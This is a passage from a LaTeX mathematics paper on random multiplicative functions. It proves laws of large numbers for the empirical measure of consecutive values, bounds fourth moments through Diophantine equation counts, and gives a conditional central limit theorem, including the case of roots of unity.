(1+||m||)^{- 2u} \right)^{1/2},$$
which implies that the assumption on $f$ given in the proposition is satisfied for all $f$ in the Sobolev space $H^s$ as soon
as $s > k$.
Unfortunately, the proposition does not apply if $f$ is a product of indicators of arcs. The weak convergence implies that
$$\int_{\mathbb{U}^k} f d\mu_{k,N} \underset{N \rightarrow \infty}{\longrightarrow}
\int_{\mathbb{U}^k} f d\mu_{k} $$
even in this case, but we don't know at which rate this convergence occurs.
\end{remark}
\begin{proof}
From Proposition \ref{momentorder2}, and
Lemma \ref{lemmaLLN} applied to $\epsilon > 0$, $\delta = 0$ and
$$A_N := N \hat{\mu}_{k,N} (m),$$
we get, for all $m \in \mathbb{Z}^d \backslash \{0\}$,
$M > 0$,
$$\mathbb{P} \left(\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/N^{-1/2 + \epsilon} \geq M
\right) \leq k K_{\epsilon, 0} M^{-2}$$
In particular, almost surely,
$$\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/(N^{-1/2 + \epsilon}
||m||^u) < \infty$$
for all $m \in \mathbb{Z}^d \backslash \{0\}$, $\epsilon > 0$, $u > k/2$.
Moreover,
$$\mathbb{P} \left(\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/N^{-1/2 + \epsilon} \geq ||m||^{u} \right) \leq
k K_{\epsilon, 0} ||m||^{- 2u}.$$
Since $- 2u < -k$, we deduce, by Borel-Cantelli lemma, that almost surely,
for all $\epsilon > 0$, $u > k/2$,
$$\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/(N^{-1/2 + \epsilon}
||m||^u) \leq 1$$
for all but finitely many $m \in \mathbb{Z}^d \backslash \{0\}$. Therefore, almost surely, for all $\epsilon > 0$, $u > k/2$,
$$\sup_{m \in \mathbb{Z}^d \backslash \{0\}}
\sup_{N \geq 1}
| \hat{\mu}_{k,N} (m)|/(N^{-1/2 + \epsilon}
||m||^u) < \infty$$
i.e.
$$\hat{\mu}_{k,N} (m)
= O(N^{-1/2 + \epsilon} ||m||^u)$$
for $m \in \mathbb{Z}^d \backslash \{0\}$, $N \geq 1$.
Let us now assume that this almost sure property holds, and let $f$ be a function
satisfying the assumptions of the proposition. Since the Fourier coefficients of $f$ are summable (i.e. $f$ is in the Wiener algebra of $\mathbb{U}^k$), the corresponding Fourier series converges uniformly to a function which is necessarily equal to $f$, since it has the same Fourier coefficients. We can then
write:
$$f(z_1, \dots, z_k) =
\sum_{m_1, \dots, m_k \in \mathbb{Z}}
\hat{f}(m_1, \dots, m_k) \prod_{j=1}^k
z_j^{m_j},$$
which implies
$$\int_{\mathbb{U}^k} f d\mu_{k,N}
= \sum_{m \in \mathbb{Z}^k}
\hat{f}(m)
\hat{\mu}_{k,N} (m)
= \int_{\mathbb{U}^k} f d\mu_{k}
+ \sum_{m \in \mathbb{Z}^k \backslash \{0\}}
\hat{f}(m)
\hat{\mu}_{k,N} (m).$$
Now, for all $u > k/2$, the last sum is dominated by
$$N^{-1/2 + \epsilon} \sum_{m \in \mathbb{Z}^k}
\hat{f}(m) ||m||^u,$$
which is finite and $O(N^{-1/2 + \epsilon})$ if $u$ is taken small enough.
\end{proof}
\section{Moments of order different from two} \label{moments}
Since we have a law of large number on
$\mu_{k,N}$, with rate of decay of order $N^{-1/2+ \epsilon}$, it is natural to look if we have a central limit theorem.
In order to do that, a possibility consists in studying moments of sums in $n$ of products of variables from $X_{n+1}$ to $X_{n+k}$.
For the sums $\sum_{n=1}^N X_n$, it seems very probable that we have not convergence to a Gaussian random variable after normalization. Indeed, the second moment of the absolute value of the renormalized sum$\frac{1}{\sqrt{N}} \sum_{n=1}^N X_n$
is equal to $1$, so if the variable converges to a standard complex Gaussian variable, we need to have
$$\mathbb{E} \left[\frac{1}{\sqrt{N}}\left|\sum_{n=1}^N
X_n \right| \right] \underset{N \rightarrow \infty}{\longrightarrow}
\frac{\sqrt{\pi}}{2}.$$
There are (at least) two contradictory conjectures about the behavior of this first moment: a conjecture by Helson \cite{H}, saying that it should tend to $0$, and a conjecture by Heap and Lindqvist \cite{HL}, saying that it should tend to an explicit constant which is appoximately 0.8769, i.e. close, but slightly smaller, than $\sqrt{\pi}/2$. In \cite{HL}, the authors show that the upper limit of the moment is smaller than 0.904, whereas
in \cite{HNR}, Harper, Nikeghbali and Raziwill prove that the first moment decays at most like $(\log \log N)^{-3 + o(1)}$: they also conjecture that the moment tends to a non-zero constant.
An equivalent of the moments of even order are computed in \cite{HNR} and \cite{HL}, and they are not bounded with respect to $N$: the moment of order $2p$ is equivalent to an explicit constant times $(\log N)^{(p-1)^2}$.
In the case of sums different from $\sum_{n=1}^N X_n$, the moment computations involve arithmetic problems of different nature. Here, we will study the example of the fourth moment of the absolute value of
$ \sum_{n=1}^N X_n X_{n+1}$: notice that the second moment is clearly equal to $N$.
We have the following result:
\begin{proposition}
We have
$$\mathbb{E}\left[ \left|\sum_{n=1}^N
X_n X_{n+1} \right|^4 \right]
= 2N^2 - N + 8 \mathcal{N}(N)
+ 4 \mathcal{N}_{=} (N),$$
where $\mathcal{N}(N)$ (resp. $\mathcal{N}_{=}(N)$) is the number of solutions of the diophantine equation
$a(a+1)d(d+1) = b(b+1)c(c+1)$ such that
the integers $a, b, c, d$ satisfy
$0 < a < b < c <d \leq N$ (resp. $0 < a < b = c < d \leq N$). Moreover, for all $\epsilon > 0$, there exists
$C_{\epsilon} > 0$, independent of $N$, such that for all $N \geq 8$,
$$ N/2 \leq 8 \mathcal{N}(N)
+ 4 \mathcal{N}_{=} (N) \leq C_{\epsilon} N^{3/2 + \epsilon}.$$
Hence,
$$\mathbb{E}\left[ \left|\sum_{n=1}^N
X_n X_{n+1} \right|^4 \right]
= 2N^2 + O_{\epsilon} (N^{3/2 + \epsilon}).$$
\end{proposition}
\begin{proof}
Expanding the fourth moment, we immediately obtain that
it is equal to the total number of solutions of the previous diophantine equation, with
$a, b, c, d \in \{1,2, \dots, N\}$.
One has $2N^2 - N$ trivial solutions: $N(N-1)$ for which $a = c\neq b = d$, $N(N-1)$ for which $a = b \neq c = d$, $N$ for which $a = b = c = d$. It remains to count the number of non-trivial solutions.
Such a solution has a minimal element among $a, b, c, d$. This element is unique: if two minimal elements are on the same side, then necessarily $a = b = c=d$, if two minimal elements are on different sides, then the other elements should be equal, which also gives a trivial solution.
Dividing the number of solutions by four, we can assume that $a$ is the unique smallest integer, which implies that $d$ is the largest one. For $b = c$, we get $\mathcal{N}_= (N)$ solutions, and for
$b \neq c$, we get $ 2 \mathcal{N}_= (N)$
solutions, the factor $2$ coming from the possible exchange between $b$ and $c$.
The lower bound $N/2$ comes from the solutions $(1,3,3,8)$ and $(1,2,5,9)$ for $8 \leq N \leq 24$, and from the solutions
of the form $(n,2n+1,3n,6n+2)$ for $N \geq 25$.
Let us now prove the upper bound.
The odd integers $A = 2a + 1$, $B = 2b+1$, $C = 2c + 1$, $D = 2d + 1$ should satisfy:
$$(A^2 - 1)(D^2-1) = (B^2 - 1)(C^2 -1).$$
Since $B$ and $C$ are closer than $A$ and $D$, we deduce
$$A^2 - 1+ D^2-1 > B^2 - 1 + C^2 - 1,$$
and then
$$\delta := (AD - BC)/2 > 0,$$
since
$$A^2 D^2 - B^2 C^2 = A^2 + D^2 - B^2 - C^2 > 0.$$
Note that $\delta$ is an integer. The last equation gives
$$4 \delta (AD - \delta) = A^2 + D^2
- (B-C)^2 - 2AD + 4 \delta,$$
and in particular
$$A^2 - 2(2 \delta +1) AD + D^2 + 4 \delta (\delta +1 ) = (B-C)^2 \geq 0.$$
If $1 < D/A \leq 2 \delta + 2$, we deduce
$$AD \left( \frac{1}{2 \delta + 2}
- 4 \delta - 2 + 2\delta + 2 \right) + 4 \delta(\delta +1) \geq 0,$$
and then
$$AD \leq \frac{4 \delta(\delta + 1)}{ 2\delta - (1/4)} = 2 (\delta +1)
\left(1 - \frac{1}{8 \delta} \right)^{-1}
\leq 2 (\delta + 1) \left( 1 + \frac{1}{7 \delta} \right) \leq 2 \delta + 2 + (4/7),
$$
$AD \leq 2 \delta +1$ since it is an odd integer, and then $BC = AD - 2 \delta \leq 1$, which gives a contradiction.
Any solution should then satisfy $D/A > 2\delta +2$.
For $\delta > \sqrt{N}$, we have necessarily $A < D /( 2\sqrt{N} + 2)
\leq (2N+1)/(2 \sqrt{N} + 2) = O(\sqrt{N})$, and then $a = O(\sqrt{N})$,
and then there are only $O(N^{3/2})$ possibilities for the couple $(a,d)$. Now, $b$ and $c$ should be divisors of $a(a+1)d(d+1) = O(N^4)$, and by the classical divisor bound, we deduce that there are $O(N^{\epsilon})$ possibilities for $(b,c)$ when $a$ and $d$ are chosen.
Hence, the number of solutions for $\delta > \sqrt{N}$ is bounded by the estimate we have claimed.
It remains to bound the number of solutions for $\delta \leq \sqrt{N}$.
We need
$$A^2 - 2(2 \delta +1) AD + D^2 + 4 \delta (\delta +1 ) = (B-C)^2,$$
i.e.
$$[D - (2 \delta + 1)A]^2 + \delta (\delta +1 )
= 4\delta(\delta + 1) A^2 + (B-C)^2.$$
We know that $D \geq A (2 \delta +2)$, and then $0 < D - (2 \delta + 1)A \leq N$, which gives, for each value of $\delta$,
$O(N)$ possibilities for $D - (2\delta +1)A$. For the moment, let us admit that for each of these possibilities, there are $O(N^{\epsilon})$ choices for $B-C$ and $A$. Then, for fixed $\delta$, we have
$O (N^{1+ \epsilon})$ choices for $(D -
(2\delta +1) A, A, B-C)$. For each choice, $B-C, A, D$ are fixed, and then also $BC = AD - 2 \delta$, and finally $B$ and $C$.
Hence, we have $O(N^{1+\epsilon})$ solutions for each $\delta \leq \sqrt{N}$, and then $O(N^{3/2 + \epsilon})$ solutions by counting all the possible $\delta$.
The claim we have admitted is a consequence of the following fact we will prove now: for $\epsilon > 0$,
the number of representations of $M$ in integers by the quadratic form $X^2 + P Y^2$ is $O(M^{\epsilon})$, uniformly in the strictly positive integer $P$. Indeed,
for such a representation, the ideal
$(X + Y \sqrt{-P})$ should be a divisor of
$(M)$ in the ring of integers $\mathcal{O}_P$ of $\mathbb{Q}[\sqrt{-P}]$, and each such ideal gives at most $6$ couples $(X,Y)$ representing $M$ (the number of elements of norm $1$ in an imaginary quadratic field is at most $6$). It is then sufficient to bound the number of divisors of $(M)$ in
$\mathcal{O}_P$ by $O(M^{\epsilon})$, uniformly in $P$. The number of divisors of $(M)$ is $\prod_{\mathfrak{p}} (v_\mathfrak{p}(M) + 1)$, where we have the prime ideal decomposition
$$(M) = \prod_{\mathfrak{p}} \mathfrak{p}^
{v_\mathfrak{p}(M)}.$$
Now, by considering the decomposition of prime numbers as products of ideals, we deduce:
$$(M) = \prod_{p \in \mathcal{P}, \, p \operatorname{inert}} (p)^{v_p(M)}
\prod_{p \in \mathcal{P}, \, p \operatorname{ramified}} \mathfrak{p}_p^{2 v_p(M)}
\prod_{p \in \mathcal{P}, \, p \operatorname{split}} \mathfrak{p}_p^{ v_p(M)} \overline{\mathfrak{p}_p}^{\, v_p(M)},
$$
$\mathfrak{p}_p$ denoting an ideal of norm $p$, and then the number of divisors of $(M)$ is
$$\prod_{p \in \mathcal{P}, \, p \operatorname{inert}} (v_p(M) + 1)
\prod_{p \in \mathcal{P}, \, p \operatorname{ramified}} (2 v_p(M) + 1)
\prod_{p \in \mathcal{P}, \, p \operatorname{split}} (v_p(M) + 1)^2
\leq \prod_{p \in \mathcal{P}}
(v_p(M) + 1)^2 = [\tau(M)]^2,
$$
where $\tau(M)$ is the number of divisors, in the usual sense,
of the integer $M$. This gives the desired bound $O(M^{\epsilon})$.
\end{proof}
\begin{remark}
Using the previous proof, one can show the following quite curious property: all the solutions of $a(a+1) d(d+1) = b(b+1) c (c+1)$ in integers $0 < a < b \leq c < d$ satisfy $d/a > 3 + 2 \sqrt{2}$. Indeed, let us assume the contrary. With the previous notation, $3 + 2 \sqrt{2} \geq d/a \geq D/A
> 2 \delta + 2$, and then $\delta = 1$, which gives $A^2 - 6AD + D^2 + 8 \geq 0$,
i.e.
$$(2a + 1)^2 - 6(2a+1)(2d+1) + (2d+1)^2
+ 8 \geq 0,$$
$$ 4 (a^2 - 6 ad + d^2) - 8a - 8d + 4 \geq 0,$$
a contradiction since $1 < d/a \leq 3 + 2 \sqrt{2}$ implies $a^2 - 6ad + d^2 \leq 0$.
The bound $3+2 \sqrt{2}$ is sharp, since we have the solutions of the form
$(u_{2k}, u_{2k+1}, u_{2k+1}, u_{2k+2})$, where
$$u_r := \frac{(1+\sqrt{2})^{r}
+ (1 - \sqrt{2})^{r} - 2}{4}.$$
\end{remark}
A consequence of the previous proposition corresponds to a bound on all the moments of order $0$ to $4$:
\begin{corollary}
We have, for all $q \in [0,2]$,
$$c_q + o(1) \leq \mathbb{E} \left[ \left| \frac{1}{\sqrt{N}} X_n X_{n+1} \right|^{2q} \right] \leq C_q + o(1),$$
where $c_q = 2^{-(q-1)_{-}} \geq 1/2$ and
$C_q = 2^{(q-1)_{+}} \leq 2$.
\end{corollary}
\begin{proof}
This result is a direct consequence of the
previous estimates for $q = 1$ and $q = 2$ and H\"older's inequality.
\end{proof}
We have proven the same equivalent for the moments of order $4$ as for sum of i.i.d. variables with the same law as $X_n X_{n+1}$. This suggests that there are "more chances" for a central limit theorem than for the sums $\sum_{n=1}^N X_n$ discussed before. Indeed, we have the following:
\begin{proposition}
If for all integers $q \geq 1$, the number of non-trivial solutions
$(n_1, \dots, n_{2r}) \in \{1, \dots, N\}^{2r}$ of the diophantine equation
$$\prod_{r=1}^q n_r(n_r+1)
= \prod_{r=1}^q n_{q+r} (n_{q+r} + 1)$$
is negligible with respect to the number of trivial solutions when $N \rightarrow \infty$ (i.e. $o(N^q)$) then we have
$$ \frac{1}{\sqrt{N}} \sum_{n=1}^{N} X_n X_{n+1} \underset{N \rightarrow \infty}{\longrightarrow} \mathcal{N}_{\mathbb{C}},$$
where $\mathcal{N}_{\mathbb{C}}$ denotes a standard Gaussian complex variable, i.e.
$(\mathcal{N}_1 + i \mathcal{N}_2)/\sqrt{2}$ where $\mathcal{N}_1, \mathcal{N}_2$ are independent standard real Gaussian variables.
\end{proposition}
\begin{proof}
If $$Y_N := \frac{1}{\sqrt{N}} \sum_{n=1}^{N} X_n X_{n+1},$$
then for integers $q_1, q_2 \geq 0$,
the moment $\mathbb{E}[Y_N^{q_1} \overline{Y_N}^{\, q_2}]$ is equal to $N^{-(q_1+ q_2)/2}$ times the number of solutions
$(n_1, \dots, n_{q_{1} + q_2}) \in \{1, \dots, N\}^{q_1 + q_2}$ of
$$\prod_{r=1}^{q_1} n_r(n_r+1)
= \prod_{r=1}^{q_2} n_{q_1+r} (n_{q_1+r} + 1).$$
If $q_1$ or $q_2$ vanishes, there is no solution, so the moment is zero. If $0 < q_1 < q_2$, there are at most $N^{q_1}$ choices for $n_1, \dots, n_{q_1}$, and once these integers are fixed, at most $N^{o(1)}$ choices for $n_{q_1+1}, \dots, n_{q_1+q_2}$ by the divisor bound. Hence, the moment tends to zero when $N \rightarrow \infty$, and we have the same conclusion for $0 < q_2 < q_1$. Finally, if $0 < q_1 = q_2 = q$, by assumption, the moment is equivalent to $N^{-q}$ times the number of trivial solutions of the corresponding diophantine equation, i.e. to the corresponding moment for the sum of i.i.d. variables, uniform on the unit circle. By the central limit theorem,
$$\mathbb{E}[|Y_N|^{2q} ] \underset{N \rightarrow \infty}{\longrightarrow}
\mathbb{E}[|\mathcal{N}_{\mathbb{C}}|^{2q}].$$
We have then proven that for all integers $q_1, q_2 \geq 0$,
$$\mathbb{E}[Y_N^{q_1} \overline{Y_N}^{\, q_2} ] \underset{N \rightarrow \infty}{\longrightarrow}
\mathbb{E}[|\mathcal{N}_{\mathbb{C}} ^{q_1} \overline{\mathcal{N}_{\mathbb{C}}}^{\, q_2} ],$$
which gives the claim.
\end{proof}
We have proven the assumption of the previous proposition for $q \in \{1,2\}$, however, our method does not generalize to larger values of $q$. The divisor bound gives immediately a domination by $N^{q + o(1)}$ for the number of solutions, and then it seems reasonable to expect that the arithmetic constraints implied by the equation are sufficient to save at least a small power of $N$. Note that this saving is not possible for the sums $\sum_{n=1}^N
X_n$, which explains a different behavior.
The previous proposition giving a "conditional CLT" can be generalized to the sums of the form
$$\sum_{n=1}^N \prod_{j=1}^k X_{n + j}^{m_j},$$
when the $m_j$'s have the same sign. The situation is more difficult if the $m_j$'s have different signs since the divisor bound alone does not directly give a useful bound on the number of solutions.
\section{Convergence of the empirical measure in the case of roots of unity} \label{uniform2q}
Here, we suppose that $(X_p)_{p \in \mathcal{P}}$ are i.i.d. uniform on the set
$\mathbb{U}_q$ of $q$-th roots of unity, $q\geq 1$ being fixed. With the notation of the previous section, we now get:
\begin{proposition} \label{qboundL2}
Let $m_1, \dots, m_k$ be integers, not all
divisible by $q$, let $\epsilon > 0$ and let $N > N' \geq 0$. Then,
$$\mathbb{E} \left[
\left|\sum_{n=N'+1}^N \prod_{j=1}^k X_{n+j}^{m_j} \right|^2 \right]
\leq C_{q,k, \epsilon} (N-N') N^{\epsilon}$$
and
$$\mathbb{E} \left[ |\hat{\mu}_{k,N}(m_1, \dots, m_N)|^2
\right] \leq \frac{C_{q,k, \epsilon}}{N^{1-\epsilon}},$$
where $C_{q,k, \epsilon} > 0$ depends only on $q, k, \epsilon$.
\end{proposition}
\begin{proof}
We can obviously assume that $m_1, \dots, m_k$ are between $0$ and $q-1$, which gives finitely many possibilities for these integers, depending only on $q$ and $k$. We can then suppose that $m_1, \dots, m_k$ are fixed at the beginning.
We have to bound the number of couples $(n_1,n_2)$ on $\{N'+1, \dots, N\}^2$ such that
$$\frac{\prod_{j=1}^k (n_1 +j)^{m_j}}{
\prod_{j=1}^k (n_2 +j)^{m_j}} \in
(\mathbb{Q}_+^*)^q,$$
where, in this proof, $(\mathbb{Q}_+^*)^q$ denotes the set of $q$-th powers of positive rational numbers.
Now, any positive integer $r$
can be decomposed as a product of a "smooth" integer whose prime factors are all strictly smaller than $k$,
and a "rough" integer whose prime factors are all larger than or equal to $k$. If
the "rough" integer is denoted $\sharp_k(r)$, the condition just above implies:
$$\frac{\sharp_k \left(\prod_{j=1}^k (n_1 +j)^{m_j}\right)}{
\sharp_k \left(\prod_{j=1}^k (n_2 +j)^{m_j}\right)} \in
(\mathbb{Q}_+^*)^q.$$
Now, the numerator and the denominator of this expression can both be written in a unique way as a product of a $q$-th perfect power and an integer whose $p$-adic valuation is between $0$ and $q-1$ for all $p \in \mathcal{P}$. If the quotient is a $q$-th power, necessarily the numerator and the denominator have the same "$q$-th power free" part. Hence, there exists a $q$-th power free integer $g$ such that
$$\sharp_k \left(\prod_{j=1}^k (n_1 +j)^{m_j}\right), \;
\sharp_k \left(\prod_{j=1}^k (n_2 +j)^{m_j}\right) \in g \mathbb{N}^q,$$
$\mathbb{N}^q$ being the set of $q$-th powers of positive integers.
Hence, the number of couples $(n_1,n_2)$ we have to estimate is bounded by
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}} [\mathcal{N}(q,k,g,N',N)]^2,
$$
where $\mathcal{N}(q,k,g,N',N)$ is the
number of integers $n \in \{N'+1, \dots, N\}$ such that
$$\sharp_k \left(\prod_{j=1}^k (n +j)^{m_j}\right) \in g \mathbb{N}^q.$$
If a prime number $p \in \mathcal{P}$ divides $n + j$ and $n+j'$ for $j \neq j' \in \{1,\dots, k\}$, it divides $|j-j'|
\in \{1, \dots, k-1\}$, and then $p < k$. Hence, the rough parts of $(n+j)^{m_j}$ are
pairwise coprime. Now, if $g_1, \dots, g_k$ are the $q$-th power free integers such that $\sharp_k[(n+j)^{m_j}] \in g_j \mathbb{N}^q$, we have $g_1 g_2 \dots g_k \in g (\mathbb{Q}_+^*)^q$, and since $g_1, \dots, g_k$ are coprime, $g_1 g_2 \dots g_k$ is $q$-th power free (as $g$), which implies $g_1 \dots g_k = g$.
Hence
$$\mathcal{N}(q,k,g,N',N)
\leq \sum_{g_1 g_2 \dots g_k = g}
\left| \left\{n \in \{N'+1, \dots N\},
\, \forall j \in \{1, \dots, k\}, \;
\sharp_{k}[(n+j)^{m_j}] \in g_j \mathbb{N}^q \right\} \right|. $$
Let us now fix an index $j_0$ such that $m_{j_0}$ is not multiple of $q$. We have
$$\mathcal{N}(q,k,g,N',N)
\leq \sum_{g_1 g_2 \dots g_k = g}
\left| \left\{n \in \{N'+1, \dots N\},
\, \sharp_{k}[ (n +j_0)^{m_{j_0}}] \in g_{j_0} \mathbb{N}^q, \forall j \neq j_0, \;
\operatorname{rad}(g_j)|(n+j) \right\} \right|,$$
where $\operatorname{rad}(g_j)$ denotes the product of the prime factors of $g_j$.
The condition on $(n +j_0)^{m_{j_0}}$
means that for all $p \in \mathcal{P}$,
$p \geq k$,
$$m_{j_0} v_p (n+j_0) \equiv v_p (g_{j_0})
\, (\operatorname{mod. } q),$$
i.e. $v_p (g_{j_0})$ is divisible by $\operatorname{gcd}( m_{j_0}, q)$ and
$$(m_{j_0}/ \operatorname{gcd}( m_{j_0}, q)) v_p (n+j_0) \equiv
v_p (g_{j_0})/ \operatorname{gcd}( m_{j_0}, q)\, (\operatorname{mod. } \rho_{j_0}),$$
where $\rho_{j_0} := q/ \operatorname{gcd}( m_{j_0}, q) $. Since $m_{j_0}/ \operatorname{gcd}( m_{j_0}, q)$ is coprime
with $\rho_{j_0}$, the last congruence is
equivalent to a congruence modulo $\rho_{j_0}$ between $v_p(n+j_0)$ and a fixed integer, which is not divisible by
$\rho_{j_0}$ if and only if $p$ divides
$g_{j_0}$. We deduce that the
condition on $(n+j_0)^{m_{j_0}}$ implies that $\sharp_k (n+j_0) \in h(q,m_{j_0},g_{j_0}) \mathbb{N}^{\rho_{j_0}}$, i.e.
$$n+j_0 = \alpha h(q,m_{j_0},g_{j_0})
A^{\rho_{j_0}},$$
where $\alpha$ is a $\rho_j$-th power
free integer whose prime factors are strictly smaller than $k$, $A$ is an integer and $h(q,m_{j_0},g_{j_0})$
is an integer depending only on $q$, $m_{j_0}$ and $g_{j_0}$, which is divisible by
$\operatorname{rad} (g_{j_0})$.
For a fixed value of $\alpha$, the
values of $A$ should be in the interval
$$I = \left( \big((N' +j_0)/[\alpha h(q,m_{j_0}, g_{j_0})] \big)^{1/\rho_{j_0}},
\big((N +j_0)/[\alpha h(q,m_{j_0}, g_{j_0})] \big)^{1/\rho_{j_0}} \right],$$
whose size is at most
$$ [\operatorname{rad}(g_{j_0})]^{-1/\rho_{j_0}} [(N+j_0)^{1/\rho_{j_0}} -
(N'+j_0)^{1/\rho_{j_0}} ]
\leq 1+ \left(\frac{N - N'}{\operatorname{rad}(g_{j_0})} \right)^{1/2},
$$
by the concavity of the power $1/\rho_{j_0}$, the fact that $\rho_{j_0}
\geq 2$ since $m_{j_0}$ is not divisible by $q$, which implies
$x^{1/\rho_{j_0}} \leq 1 + \sqrt{x}$.
Now, the conditions on $n+j$ for $j \neq j_0$ imply a condition of congruence
for $\alpha h (q, m_{j_0}, g_{j_0}) A^{\rho_{j_0}}$, modulo all the primes dividing one of the $g_j$'s for $j \neq j_0$. These primes do not divide $\alpha$, since $\alpha$ has all prime factors smaller than $k$, and $g_j$ divides $\sharp_k[(n_0 + j)^{m_j}]$. They also do not divide $h (q, m_{j_0}, g_{j_0})$,
since this integer has the same prime factors as $g_{j_0}$, which is prime with $g_j$.
Hence, we get a condition of congruence
for $A^{\rho_{j_0}}$ modulo all primes dividing $g_j$ for some $j \neq j_0$.
For each of these primes, this gives
at most $\rho_{j_0} \leq q$ congruence classes, and then, by the chinese reminder theorem, we get at most $q^{\omega\left(\prod_{j \neq j_0}
g_j\right)}$ classes modulo
$\prod_{j \neq j_0} \operatorname{rad}(g_j)$, where $\omega$ denotes the number of prime factors of an integer.
The number of integers $A \in I$ satisfying the congruence conditions is then at most:
$$q^{\omega\left(\prod_{j \neq j_0}
g_j\right)}
\left[ 1 + \frac{1}{\prod_{j \neq j_0}
\operatorname{rad}(g_j)} \left(
1 + \frac{N-N'}{\operatorname{rad}(g_{j_0})}
\right)^{1/2} \right]
\leq [\tau(g)]^{\log q/\log 2}
\left[ 1+ \left(1 + \frac{N - N'}{\operatorname{rad}(g)} \right)^{1/2} \right],$$
where $\tau(g)$ denotes the number of divisors of $g$.
Now, $\alpha$ has primes factors smaller than $k$ and $p$-adic valuations smaller than $q$, which certainly gives $\alpha \leq
(k!)^q$. Hence, by considering all the possible values of $\alpha$, and all the possible $g_1, \dots, g_k$, which should divide $g$, we deduce
$$ \mathcal{N}(q,k,g,N',N)
\leq (k!)^q
[\tau(g)]^{k + (\log q/\log 2)}
\left[2 + \left( \frac{N - N'}{\operatorname{rad}(g)} \right)^{1/2} \right].$$
If $\mathcal{N}(q,k,g,N',N) > 0$, we have necessarily $$g \leq \prod_{j=1}^k (N+j)^{m_k} \leq (N+k)^{kq}
\leq (1+k)^{kq} N^{kq}.$$ Using the divisor bound, we deduce that for all $\epsilon > 0$, there exists $C^{(1)}_{q,k,
\epsilon}$ such that for all $g \leq
(1+k)^{kq} N^{kq}$,
$$2 (k!)^q
[\tau(g)]^{k + (\log q/\log 2)}
\leq C^{(1)}_{q,k,
\epsilon} N^{\epsilon},$$
and then
$$\mathcal{N}(q,k,g,N',N)
\leq C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\left[ 1 + \left( \frac{N - N'}{\operatorname{rad}(g)} \right)^{1/2} \right],$$
i.e.
$$\left(\mathcal{N}(q,k,g,N',N)
- C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\right)_+ \leq C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
(N - N')^{1/2} (\operatorname{rad}(g))^{-1/2}.$$
Summing the square of this bound for all possible $g$ gives
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}} \left(\mathcal{N}(q,k,g,N',N)
- C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\right)^2_+
\leq \left(C^{(1)}_{q,k,
\epsilon}\right)^2 N^{2 \epsilon} (N-N')
\sum_{g \geq 1, q\operatorname{-th \, power \, free}}
\frac{\mathds{1}_{g \leq (1+k)^{kq} N^{kq}}}{\operatorname{rad}(g)}.$$
Now, since all numbers up to
$(1+k)^{kq}N^{kq}$ have prime factors smaller than this quantity, we deduce, using the multiplicativity of the radical:
\begin{align*}\sum_{g \geq 1, q\operatorname{-th \, power \, free}}
\frac{\mathds{1}_{g \leq (1+k)^{kq} N^{kq}}}{\operatorname{rad}(g)}
& \leq \prod_{p \in \mathcal{P},
p \leq (1+k)^{kq}N^{kq}} \left(
\sum_{j=0}^{q-1} \frac{1}{\operatorname{rad} (p^j)} \right)
\\ & \leq \prod_{p \in \mathcal{P},
p \leq (1+k)^{kq}N^{kq}} \left(
1 + \frac{q-1}{p} \right) \,
\leq \prod_{p \in \mathcal{P},
p \leq (1+k)^{kq}N^{kq}} \left(
1 - \frac{1}{p} \right)^{1-q}
\end{align*}
which, by Mertens' theorem, is smaller
than a constant, depending on $k$ and $q$,
times $\log^{q-1}(1+ N)$.
We deduce that there exists a constant
$C^{(2)}_{q,k,\epsilon} >0$, such that
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}} \left(\mathcal{N}(q,k,g,N',N)
- C^{(1)}_{q,k,
\epsilon} N^{\epsilon}
\right)^2_+
\leq C^{(2)}_{q,k,\epsilon}
N^{3\epsilon} (N-N').$$
Now, it is clear that
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}}\mathcal{N}(q,k,g,N',N)
= N'-N,$$
since this sum counts all the integers $n$
from $N'+1$ to $N$, regrouped in function
of the $q$-th power free part of
$\sharp_k\left( \prod_{j=1}^k (n+j)^{m_j}
\right)$.
Using the inequality $x^2 \leq (x-a)_+^2 + 2ax$, available for all $a, x \geq 0$, we deduce
$$\sum_{g \geq 1, q\operatorname{-th \, power \, free}}[\mathcal{N}(q,k,g,N',N)]^2
\leq C^{(2)}_{q,k,\epsilon}
N^{3\epsilon} (N-N') +
2 C^{(1)}_{q,k,
\epsilon} N^{\epsilon} (N-N').$$
This result gives the first inequality of the proposition, for
$$C_{q,k,\epsilon}
= C^{(2)}_{q,k,\epsilon/3}
+ 2C^{(1)}_{q,k,\epsilon/3}.$$
The second inequality is obtained by taking $N' = 0$ and dividing by $N^2$.
\end{proof}
\begin{corollary}
For all $(m_1, \dots, m_k) \in \mathbb{Z}^k$, $\hat{\mu}_{k,N}(m_1, \dots, m_k)$ converges
in $L^2$, and then in probability, to the corresponding Fourier coefficient of the uniform distribution $\mu_{k,q}$ on $\mathbb{U}_q^k$. In other words, $\mu_{k,N}$ converges weakly in probability to $\mu_{k,q}$.
\end{corollary}
We also have a strong law of large numbers.
\begin{proposition}
Almost surely, $\mu_{k,N}$ weakly converges to $\mu_{k,q}$. More precisely, for all $(t_1, \dots, t_k) \in (\mathbb{U}_q)^k$, the proportion of $n \leq N$ such that
$(X_{n+1}, \dots, X_{n+k}) = (t_1, \dots, t_k)$ is almost surely $q^{-k} + O(N^{-1/2 + \epsilon})$ for all $\epsilon > 0$.
\end{proposition}
\begin{proof}
By Lemma \ref{lemmaLLN} and Proposition
\ref{qboundL2}, we deduce that almost surely, for all $\epsilon > 0$,
$0 \leq m_1, \dots, m_k \leq q-1$,
$(m_1, \dots, m_k) \neq (0,0, \dots, 0)$,
$$\hat{\mu}_{k,n}(m_1, \dots, m_k)
= O( N^{-1/2 + \epsilon}).$$
Since we have finitely many values of $m_1, \dots, m_k$, we can take the $O$ uniform in $m_1, \dots, m_k$. Then, by inverting discrete Fourier transform on $\mathbb{U}_q^k$, we deduce the claim.
\end{proof}
\section{More general distributions on the unit circle} \label{general}
